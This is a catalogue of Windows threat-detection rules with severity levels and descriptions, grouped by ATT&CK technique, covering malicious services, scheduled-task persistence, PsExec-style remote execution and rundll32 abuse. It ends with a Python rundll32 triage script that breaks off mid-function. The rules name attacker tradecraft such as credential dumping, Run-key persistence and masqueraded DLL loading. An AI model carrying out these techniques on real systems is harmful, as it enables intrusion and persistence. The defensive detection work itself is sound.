    Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
  • MSI Spawned Cmd and Powershell Spawned Processes - Level: high
    Description: This rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes
  • Always Install Elevated Parent Child Correlated - Level: high
    Description: This rule looks for any process with low privilege launching the Windows Installer service (msiexec.exe) that tries to install MSI packages with SYSTEM privilege
attack.t1543.003 52
Show Rules (52)
  • Vulnerable AVAST Anti Rootkit Driver Load - Level: high
    Description: Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products
  • Vulnerable Driver Load By Name - Level: low
    Description: Detects the load of known vulnerable drivers via their names only.
  • Vulnerable GIGABYTE Driver Load - Level: high
    Description: Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation
  • Vulnerable HW Driver Load - Level: high
    Description: Detects the load of a legitimate signed driver named HW.sys that is often used by threat actors or malware for privilege escalation
  • New Service Creation - Level: low
    Description: Detects creation of a new service.
  • CobaltStrike Service Installations - Security - Level: high
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement
  • Remote Access Tool Services Have Been Installed - Security - Level: medium
    Description: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform
  • CobaltStrike Service Installations - System - Level: critical
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement
  • Moriya Rootkit - System - Level: critical
    Description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
  • New PDQDeploy Service - Server Side - Level: medium
    Description: Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines. PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines
  • New PDQDeploy Service - Client Side - Level: medium
    Description: Detects PDQDeploy service installation on the target system. When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1
  • ProcessHacker Privilege Elevation - Level: high
    Description: Detects a ProcessHacker tool that elevated privileges to a very high level
  • Remote Access Tool Services Have Been Installed - System - Level: medium
    Description: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform
  • Sliver C2 Default Service Installation - Level: high
    Description: Detects known malicious service installations that appear in cases in which Sliver implants execute PsExec commands
  • Suspicious Service Installation - Level: high
    Description: Detects suspicious service installation commands
  • Uncommon Service Installation Image Path - Level: medium
    Description: Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.
  • Service Installation in Suspicious Folder - Level: medium
    Description: Detects service installation in suspicious folder appdata
  • Service Installation with Suspicious Folder Pattern - Level: high
    Description: Detects service installation with suspicious folder patterns
  • Suspicious Service Installation Script - Level: high
    Description: Detects suspicious service installation scripts
  • Malicious Driver Load - Level: high
    Description: Detects loading of known malicious drivers via their hash.
  • Malicious Driver Load By Name - Level: medium
    Description: Detects loading of known malicious drivers via the file name of the drivers.
  • Driver Load From A Temporary Directory - Level: high
    Description: Detects a driver load from a temporary directory
  • Vulnerable Driver Load By Name - Level: low
    Description: Detects the load of known vulnerable drivers via the file name of the drivers.
  • Vulnerable HackSys Extreme Vulnerable Driver Load - Level: high
    Description: Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors
  • Vulnerable WinRing0 Driver Load - Level: high
    Description: Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation
  • Vulnerable Driver Load - Level: high
    Description: Detects loading of known vulnerable drivers via their hash.
  • PSEXEC Remote Execution File Artefact - Level: high
    Description: Detects creation of the PSEXEC key file, which is created any time a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
  • Potential Discovery Activity Via Dnscmd.EXE - Level: medium
    Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones are used to host the DNS records for a particular domain.
  • New Service Creation Using PowerShell - Level: low
    Description: Detects the creation of a new service using powershell.
  • Suspicious Service DACL Modification Via Set-Service Cmdlet - Level: high
    Description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (only available with PowerShell 7) that can be used to hide services or make them unstoppable
  • New Service Creation Using Sc.EXE - Level: low
    Description: Detects the creation of a new service using the "sc.exe" utility.
  • New Kernel Driver Via SC.EXE - Level: medium
    Description: Detects creation of a new service (kernel driver) with the type "kernel"
  • Allow Service Access Using Security Descriptor Tampering Via Sc.EXE - Level: high
    Description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.
  • Deny Service Access Using Security Descriptor Tampering Via Sc.EXE - Level: high
    Description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.
  • Suspicious Service Path Modification - Level: high
    Description: Detects service path modification via the "sc" binary to a suspicious command or path
  • Potential Persistence Attempt Via Existing Service Tampering - Level: medium
    Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
  • Suspicious New Service Creation - Level: high
    Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
  • Sysinternals PsService Execution - Level: medium
    Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
  • Sysinternals PsSuspend Execution - Level: medium
    Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
  • Potential CobaltStrike Service Installations - Registry - Level: high
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement.
  • ServiceDll Hijack - Level: medium
    Description: Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.
  • CosmicDuke Service Installation - Level: critical
    Description: Detects the installation of a service named "javamtsup" on the system. The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence.
  • StoneDrill Service Install - Level: high
    Description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky
  • Turla Service Install - Level: high
    Description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET
  • Turla PNG Dropper Service - Level: critical
    Description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
  • OilRig APT Activity - Level: critical
    Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
  • OilRig APT Registry Persistence - Level: critical
    Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - Security - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - System - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • Moriya Rootkit File Created - Level: critical
    Description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
  • Malicious Service Installations - Level: critical
    Description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
  • Rare Service Installations - Level: low
    Description: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services
attack.t1053.005 51
Show Rules (51)
  • Suspicious Add Scheduled Task From User AppData Temp - Level: high
    Description: Detects schtasks.exe creating a task from the user's AppData\Local\Temp folder
  • Persistence and Execution at Scale via GPO Scheduled Task - Level: high
    Description: Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale
  • Suspicious Scheduled Task Creation - Level: high
    Description: Detects suspicious scheduled task creation events, based on attributes such as paths, command line flags, etc.
  • Important Scheduled Task Deleted/Disabled - Level: high
    Description: Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities
  • Suspicious Scheduled Task Update - Level: high
    Description: Detects update to a scheduled task event that contain suspicious keywords.
  • Scheduled Task Executed From A Suspicious Location - Level: medium
    Description: Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or is an unusual program to be run from a Scheduled Task
  • Scheduled Task Executed Uncommon LOLBIN - Level: medium
    Description: Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task
  • Powershell Create Scheduled Task - Level: medium
    Description: Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation - Level: high
    Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
  • Suspicious Modification Of Scheduled Tasks - Level: high
    Description: Detects when an attacker tries to modify an already existing scheduled task to run from a suspicious location. Attackers can create a simple-looking task in order to avoid detection on creation, as creation is often the most closely watched event; instead they modify the task after creation to include their malicious payload
  • Suspicious Schtasks Execution AppData Folder - Level: high
    Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local
  • Scheduled Task Creation Via Schtasks.EXE - Level: low
    Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
  • Suspicious Scheduled Task Creation Involving Temp Folder - Level: high
    Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
  • Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE - Level: medium
    Description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
  • Schtasks From Suspicious Folders - Level: high
    Description: Detects scheduled task creations that have suspicious action command and folder combinations
  • Suspicious Scheduled Task Name As GUID - Level: medium
    Description: Detects creation of a scheduled task with a GUID like name
  • Uncommon One Time Only Scheduled Task At 00:00 - Level: high
    Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
  • Potential Persistence Via Microsoft Compatibility Appraiser - Level: medium
    Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks in order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
  • Potential Persistence Via Powershell Search Order Hijacking - Task - Level: high
    Description: Detects suspicious PowerShell execution via a scheduled task where the command ends with suspicious flags that hide the PowerShell instance instead of executing scripts or commands. This could be a sign of persistence via the PowerShell "Get-Variable" technique as seen being used in Colibri Loader
  • Scheduled Task Executing Payload from Registry - Level: medium
    Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
  • Scheduled Task Executing Encoded Payload from Registry - Level: high
    Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
  • Suspicious Schtasks Schedule Types - Level: high
    Description: Detects scheduled task creations or modification on a suspicious schedule type
  • Suspicious Schtasks Schedule Type With High Privileges - Level: medium
    Description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
  • Suspicious Scheduled Task Creation via Masqueraded XML File - Level: medium
    Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
  • Suspicious Command Patterns In Scheduled Task Creation - Level: high
    Description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
  • Schtasks Creation Or Modification With SYSTEM Privileges - Level: high
    Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
  • Scheduled TaskCache Change by Uncommon Program - Level: high
    Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
  • Potential Registry Persistence Attempt Via Windows Telemetry - Level: high
    Description: Detects potential persistence behavior using the windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
  • Turla Group Commands May 2020 - Level: critical
    Description: Detects commands used by Turla group as reported by ESET in May 2020
  • OilRig APT Activity - Level: critical
    Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
  • OilRig APT Registry Persistence - Level: critical
    Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - Security - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - System - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • Defrag Deactivation - Level: medium
    Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
  • Potential BearLPE Exploitation - Level: high
    Description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write
  • Operation Wocao Activity - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Operation Wocao Activity - Security - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • ChromeLoader Malware Execution - Level: high
    Description: Detects execution of ChromeLoader malware via a registered scheduled task
  • Serpent Backdoor Payload Execution Via Scheduled Task - Level: high
    Description: Detects post exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
  • Potential ACTINIUM Persistence Activity - Level: high
    Description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
  • Diamond Sleet APT Scheduled Task Creation - Level: critical
    Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
  • Kapeka Backdoor Persistence Activity - Level: high
    Description: Detects Kapeka backdoor persistence activity. Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not). For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM. To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command. Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.
  • Kapeka Backdoor Scheduled Task Creation - Level: high
    Description: Detects Kapeka backdoor scheduled task creation based on attributes such as paths, command line flags, etc.
  • Scheduled Task Deletion - Level: low
    Description: Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME
  • Scheduled Task Created - FileCreation - Level: low
    Description: Detects the creation of a scheduled task via file creation.
  • Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location - Level: low
    Description: Detects the loading of the "taskschd.dll" module from a process that is located in a potentially suspicious or uncommon directory. The loading of this DLL might indicate that the application has the capability to create a scheduled task via the "Schedule.Service" COM object. Investigation of the loading application and its behavior is required to determine if it is malicious.
  • Scheduled Task Creation From Potential Suspicious Parent Location - Level: medium
    Description: Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location. Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
  • Scheduled Task Created - Registry - Level: low
    Description: Detects the creation of a scheduled task via Registry keys.
  • Remote Schtasks Creation - Level: medium
    Description: Detects remote execution via scheduled task creation or update on the destination host
  • Rare Schtasks Creations - Level: low
    Description: Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code
  • Rare Scheduled Task Creations - Level: low
    Description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.
attack.t1569.002 50
Show Rules (50)
  • Credential Dumping Tools Service Execution - Level: critical
    Description: Detects well-known credential dumping tools execution via service execution events
  • PowerShell Scripts Run by a Services - Level: high
    Description: Detects powershell script installed as a Service
  • PsExec Pipes Artifacts - Level: medium
    Description: Detects use of PsExec via pipe creation or access to its pipes
  • Renamed PaExec Execution - Level: medium
    Description: Detects execution of renamed paexec via imphash and executable product string
  • PsExec Tool Execution - Level: low
    Description: Detects PsExec service execution via default service image name
  • PsExec Service Start - Level: low
    Description: Detects a PsExec service start
  • Remote Server Service Abuse for Lateral Movement - Level: high
    Description: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR
  • MITRE BZAR Indicators for Execution - Level: medium
    Description: Windows DCE-RPC functions which indicate execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE
  • DNS Events Related To Mining Pools - Level: low
    Description: Identifies clients that may be performing DNS lookups associated with common currency mining pools.
  • CobaltStrike Service Installations - Security - Level: high
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement
  • Credential Dumping Tools Service Execution - Security - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Metasploit Or Impacket Service Installation Via SMB PsExec - Level: high
    Description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
  • PowerShell Scripts Installed as Services - Security - Level: high
    Description: Detects powershell script installed as a Service
  • Remote Access Tool Services Have Been Installed - Security - Level: medium
    Description: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform
  • CobaltStrike Service Installations - System - Level: critical
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement
  • smbexec.py Service Installation - Level: high
    Description: Detects the use of smbexec.py tool by detecting a specific service installation
  • Credential Dumping Tools Service Execution - System - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • PowerShell Scripts Installed as Services - Level: high
    Description: Detects powershell script installed as a Service
  • CSExec Service Installation - Level: medium
    Description: Detects CSExec service installation and execution events
  • HackTool Service Registration or Execution - Level: high
    Description: Detects installation or execution of services
  • PAExec Service Installation - Level: medium
    Description: Detects PAExec service installation
  • ProcessHacker Privilege Elevation - Level: high
    Description: Detects a ProcessHacker tool that elevated privileges to a very high level
  • RemCom Service Installation - Level: medium
    Description: Detects RemCom service installation and execution events
  • Remote Access Tool Services Have Been Installed - System - Level: medium
    Description: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform
  • Sliver C2 Default Service Installation - Level: high
    Description: Detects known malicious service installations that appear in cases in which Sliver implants execute PsExec commands
  • PsExec Service Installation - Level: medium
    Description: Detects PsExec service installation and execution events
  • PSExec and WMI Process Creations Block - Level: high
    Description: Detects blocking of process creations originating from PSExec and WMI commands
  • CSExec Service File Creation - Level: medium
    Description: Detects default CSExec service filename which indicates CSExec service installation and execution
  • RemCom Service File Creation - Level: medium
    Description: Detects default RemCom service filename which indicates RemCom service installation and execution
  • PsExec Service File Creation - Level: low
    Description: Detects default PsExec service filename which indicates PsExec service installation and execution
  • PUA - CSExec Default Named Pipe - Level: medium
    Description: Detects default CSExec pipe creation
  • PUA - PAExec Default Named Pipe - Level: medium
    Description: Detects PAExec default named pipe
  • PUA - RemCom Default Named Pipe - Level: medium
    Description: Detects default RemCom pipe creation
  • PsExec Tool Execution From Suspicious Locations - PipeName - Level: medium
    Description: Detects PsExec default pipe creation where the image executed is located in a suspicious location, which could indicate that the tool is being used in an attack
  • HackTool - SharpUp PrivEsc Tool Execution - Level: critical
    Description: Detects the use of SharpUp, a tool for local privilege escalation
  • Start Windows Service Via Net.EXE - Level: low
    Description: Detects the usage of the "net.exe" command to start a service using the "start" flag
  • PUA - CsExec Execution - Level: high
    Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative
  • PUA - NirCmd Execution - Level: medium
    Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
  • PUA - NirCmd Execution As LOCAL SYSTEM - Level: high
    Description: Detects the use of NirCmd tool for command execution as SYSTEM user
  • PUA - NSudo Execution - Level: high
    Description: Detects the use of NSudo tool for command execution
  • PUA - RunXCmd Execution - Level: high
    Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
  • Rundll32 Execution Without Parameters - Level: high
    Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
  • Potential CobaltStrike Service Installations - Registry - Level: high
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement.
  • PowerShell as a Service in Registry - Level: high
    Description: Detects that PowerShell code is written to the registry as a service.
  • CosmicDuke Service Installation - Level: critical
    Description: Detects the installation of a service named "javamtsup" on the system. The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence.
  • DNS RCE CVE-2020-1350 - Level: critical
    Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
  • Potential CVE-2022-26809 Exploitation Attempt - Level: high
    Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
  • PsExec Default Named Pipe - Level: low
    Description: Detects PsExec service default pipe creation
  • Malicious Service Installations - Level: critical
    Description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
  • Metasploit Or Impacket Service Installation Via SMB PsExec - Level: high
    Description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
attack.t1218.011 44
  • Suspicious Rundll32 Script in CommandLine - Level: medium
    Description: Detects suspicious process related to rundll32 based on arguments
  • Remote Thread Creation Via PowerShell In Uncommon Target - Level: medium
    Description: Detects the creation of a remote thread from a Powershell process in an uncommon target process
  • SCR File Write Event - Level: medium
    Description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
  • Unsigned DLL Loaded by Windows Utility - Level: medium
    Description: Detects windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code.
  • Rundll32 Internet Connection - Level: medium
    Description: Detects a rundll32 that communicates with public IP addresses
  • Outbound Network Connection To Public IP Via Winlogon - Level: medium
    Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses
  • Process Access via TrolleyExpress Exclusion - Level: high
    Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • HackTool - F-Secure C3 Load by Rundll32 - Level: critical
    Description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
  • CobaltStrike Load by Rundll32 - Level: high
    Description: Rundll32 can be used by Cobalt Strike with the StartW function to load DLLs from the command line.
  • HackTool - RedMimicry Winnti Playbook Execution - Level: high
    Description: Detects actions caused by the RedMimicry Winnti playbook, an automated breach emulation utility
  • Code Execution via Pcwutl.dll - Level: medium
    Description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
  • Rundll32 InstallScreenSaver Execution - Level: medium
    Description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
  • Suspicious Rundll32 Setupapi.dll Activity - Level: medium
    Description: The setupapi.dll library provides the InstallHinfSection function for processing INF files. An INF file may contain instructions to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence by modifying one of the Run or RunOnce registry keys, to run a process, or to chain calls into other DLLs (see references). The InstallHinfSection function in setupapi.dll calls the runonce.exe executable regardless of the actual content of the INF file.
  • Shell32 DLL Execution in Suspicious Directory - Level: high
    Description: Detects shell32.dll executing a DLL in a suspicious directory
  • RunDLL32 Spawning Explorer - Level: high
    Description: Detects RunDLL32.exe spawning explorer.exe as a child, which is very uncommon; Gamarue has often been observed spawning the explorer.exe process in this unusual way
  • Potentially Suspicious Rundll32 Activity - Level: medium
    Description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities
  • Suspicious Control Panel DLL Load - Level: high
    Description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
  • Suspicious Rundll32 Execution With Image Extension - Level: high
    Description: Detects the execution of Rundll32.exe with DLL files masquerading as image files
  • Suspicious ShellExec_RunDLL Call Via Ordinal - Level: high
    Description: Detects a suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through its ordinal number to launch other commands. Adversaries might use only the ordinal number in order to bypass existing detections that alert on the usage of ShellExec_RunDLL on the command line.
  • Suspicious Rundll32 Activity Invoking Sys File - Level: high
    Description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
  • Potentially Suspicious Rundll32.EXE Execution of UDL File - Level: medium
    Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
  • Rundll32 Execution With Uncommon DLL Extension - Level: medium
    Description: Detects the execution of rundll32 with a command line that doesn't contain a common extension
  • Rundll32 UNC Path Execution - Level: high
    Description: Detects rundll32 execution where the DLL is located on a remote location (share)
  • Bad Opsec Defaults Sacrificial Processes With Improper Arguments - Level: high
    Description: Detects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
  • Potential PowerShell Execution Via DLL - Level: high
    Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. This detection assumes that PowerShell commands are passed via the CommandLine.
  • ScreenSaver Registry Key Set - Level: medium
    Description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
  • ZxShell Malware - Level: critical
    Description: Detects a ZxShell start by the well-known exported function name that is called
  • Fireball Archer Install - Level: high
    Description: Detects Archer malware invocation via rundll32
  • NotPetya Ransomware Activity - Level: critical
    Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
  • Sofacy Trojan Loader Activity - Level: high
    Description: Detects Trojan loader activity as used by APT28
  • APT29 2018 Phishing Campaign File Indicators - Level: critical
    Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
  • APT29 2018 Phishing Campaign CommandLine Indicators - Level: critical
    Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
  • Equation Group DLL_U Export Function Load - Level: critical
    Description: Detects a specific export function name used by one of EquationGroup tools
  • Potential Emotet Rundll32 Execution - Level: critical
    Description: Detects Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL
  • EvilNum APT Golden Chickens Deployment Via OCX Files - Level: critical
    Description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
  • Potential Bumblebee Remote Thread Creation - Level: high
    Description: Detects remote thread injection events based on action seen used by bumblebee
  • IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 - Level: high
    Description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID
  • Rhadamanthys Stealer Module Launch Via Rundll32.EXE - Level: medium
    Description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
  • Kapeka Backdoor Loaded Via Rundll32.EXE - Level: high
    Description: Detects the Kapeka Backdoor binary being loaded by rundll32.exe. The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
  • Kapeka Backdoor Execution Via RunDLL32.EXE - Level: high
    Description: Detects the Kapeka backdoor process execution pattern, where the dropper launches the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.
  • Potential Raspberry Robin CPL Execution Activity - Level: high
    Description: Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. This behavior was observed in multiple Raspberry-Robin variants.
  • DLL Call by Ordinal Via Rundll32.EXE - Level: medium
    Description: Detects calls of DLL exports by ordinal number via rundll32.exe.
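
The rundll32 rules in this group mostly reduce to a few command-line heuristics: no arguments at all, a DLL on a UNC path, an export called by ordinal, a DLL whose extension is not a DLL extension (including image extensions used for masquerading), a command line that ends in ",RunDLL" or ",Control_RunDLL", and shell32's Control_RunDLL / ShellExec_RunDLL launching something from a user-writable directory. The following Python is an added example, not code from this report or from the Sigma project: it parses a rundll32 command line into DLL, export and arguments and applies those heuristics to a handful of constructed process-creation records. Field names, sample command lines and the ordinal values in the samples are constructed.

```python
"""Rundll32 command-line triage (added example; not from the report or Sigma).

Heuristic names returned, mirroring the rule descriptions above:
  no_parameters, unc_path, ordinal_export, shell32_ordinal, image_extension,
  uncommon_extension, emotet_style_export, shellexec_rundll,
  shell32_launch_from_user_dir
Record field names and sample command lines are constructed for this example.
"""
import ntpath
import re

# rundll32 with or without path/quotes/.exe, then the rest of the command line
RUNDLL32_RE = re.compile(r'^\s*"?(?:[^\s"]*[\\/])?rundll32(?:\.exe)?"?\s*(.*)$', re.IGNORECASE)
COMMON_DLL_EXTS = {".dll", ".cpl", ".ocx", ".ax", ".drv"}
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".bmp", ".ico", ".tif", ".tiff"}
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\", "\\public\\")


def parse_rundll32(cmdline):
    """Split 'rundll32 <dll>,<export> [args]' into (dll, export, args); None if not rundll32."""
    m = RUNDLL32_RE.match(cmdline)
    if not m:
        return None
    rest = m.group(1).strip()
    if not rest:
        return "", "", ""
    if rest[0] == '"':                                  # quoted DLL path
        close = rest.find('"', 1)
        close = len(rest) if close == -1 else close
        dll_token, args = rest[1:close], rest[close + 1:].strip()
    else:
        dll_token, _, args = rest.partition(" ")
        args = args.strip()
    dll, sep, export = dll_token.partition(",")
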